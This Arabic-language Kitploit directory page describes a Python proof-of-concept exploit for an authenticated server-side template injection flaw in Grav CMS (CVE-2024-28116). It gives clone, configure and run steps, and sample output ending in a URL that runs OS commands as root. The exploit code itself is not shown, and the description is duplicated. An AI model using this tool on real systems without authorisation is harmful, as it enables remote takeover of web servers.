Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
GenGravSSTIExploit — هو سكربت Python من نوع PoC يستغل ثغرة حقن القوالب من جانب الخادم (SSTI) بعد المصادقة في Grav CMS الإصدارات <= 1.7.44 (CVE-2024-28116) | Kitploit
أدوات/GitHubGitHub/geniuszly/gengravsstiexploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

هو سكربت Python من نوع PoC يستغل ثغرة حقن القوالب من جانب الخادم (SSTI) بعد المصادقة في Grav CMS الإصدارات <= 1.7.44 (CVE-2024-28116)

عرض المستودع
7237منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EN

GenGravSSTIExploit هو سكربت Python (PoC) يستغل ثغرة حقن القوالب من جانب الخادم (SSTI) المُوثّقة في Grav CMS الإصدارات <= 1.7.44 (CVE-2024-28116). تسمح هذه الثغرة لمستخدم بصلاحيات محرر بتنفيذ أوامر نظام التشغيل على خادم بعيد.

ملاحظة: يتطلب هذا السكربت بيانات اعتماد صالحة للمصادقة على لوحة تحكم Grav CMS.

الميزات

  • المصادقة على لوحة إدارة Grav CMS باستخدام بيانات اعتماد المحرر.
  • إنشاء صفحة جديدة على نظام إدارة المحتوى لحقن حمولة.
  • تنفيذ أوامر نظام التشغيل عن بُعد عبر استغلال ثغرة SSTI.

المتطلبات

  • Python 3.x
  • مكتبة requests (قم بتثبيتها باستخدام pip install requests)

الاستخدام

  1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. تكوين بيانات الاعتماد

    قم بتعديل السكربت لتوفير بيانات اعتماد محرر Grav CMS الخاصة بك:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. تشغيل السكربت

    استخدم الأمر التالي لتشغيل السكربت:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: عنوان URL الهدف بالتنسيق http[s]://hostname.
    • <PORT>: رقم المنفذ (الافتراضي هو 80).

    مثال:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. التفاعل مع الاستغلال

    إذا نجح الاستغلال، فستحصل على رابط URL يمكنك من خلاله تنفيذ أوامر نظام التشغيل:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    

مثال على الإخراج

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

سينفذ السكربت كل خطوة، وسيزودك بالتحديثات عبر الطرفية. إليك ما قد تراه:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

بعد اكتمال السكربت، سترى رسالة تحتوي على رابط الصفحة المحقونة. يمكنك زيارة هذا الرابط لتنفيذ أوامر نظام التشغيل:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

زيارة الرابط مع الأمر المحدد ستعرض المخرجات مباشرة على الصفحة:

root@kitploit:~
Cmd-Output:
root

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح بها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.

RU

GenGravSSTIExploit هو سكربت Python (PoC) يستغل ثغرة حقن القوالب من جانب الخادم (SSTI) المُوثّقة في Grav CMS الإصدارات <= 1.7.44 (CVE-2024-28116). تسمح هذه الثغرة لمستخدم بصلاحيات محرر بتنفيذ أوامر نظام التشغيل على خادم بعيد.

ملاحظة: يتطلب السكربت بيانات اعتماد صالحة للمصادقة في لوحة إدارة Grav CMS.

الميزات

  • المصادقة في لوحة إدارة Grav CMS باستخدام بيانات اعتماد المحرر.
  • إنشاء صفحة جديدة على نظام إدارة المحتوى لحقن حمولة.
  • تنفيذ أوامر نظام التشغيل عن بُعد باستخدام ثغرة SSTI.

المتطلبات

  • Python 3.x
  • مكتبة requests (قم بتثبيتها عبر pip install requests)

الاستخدام

  1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. تكوين بيانات الاعتماد

    قم بتعديل السكربت وأدخل بيانات اعتماد محرر Grav CMS:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. تشغيل السكربت

    استخدم الأمر التالي لتشغيل السكربت:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: عنوان URL الهدف بالتنسيق http[s]://hostname.
    • <PORT>: رقم المنفذ (الافتراضي 80).

    مثال:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. التفاعل مع الاستغلال

    إذا نجح الاستغلال، فستحصل على رابط URL يمكنك من خلاله تنفيذ أوامر نظام التشغيل:

    root@kitploit:~
    [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_<ID>?do=<command>
    

مثال على الإخراج

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

سينفذ السكربت كل خطوة، وسيزودك بالتحديثات عبر الطرفية. إليك ما قد تراه:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

بعد اكتمال عمل السكربت، سترى رسالة تحتوي على رابط الصفحة المحقونة. يمكنك زيارة هذا الرابط لتنفيذ الأوامر:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

زيارة الرابط مع الأمر المحدد ستعرض المخرجات مباشرة على الصفحة:

root@kitploit:~
Cmd-Output:
root

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح بها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا السكربت.

تنزيل الأداة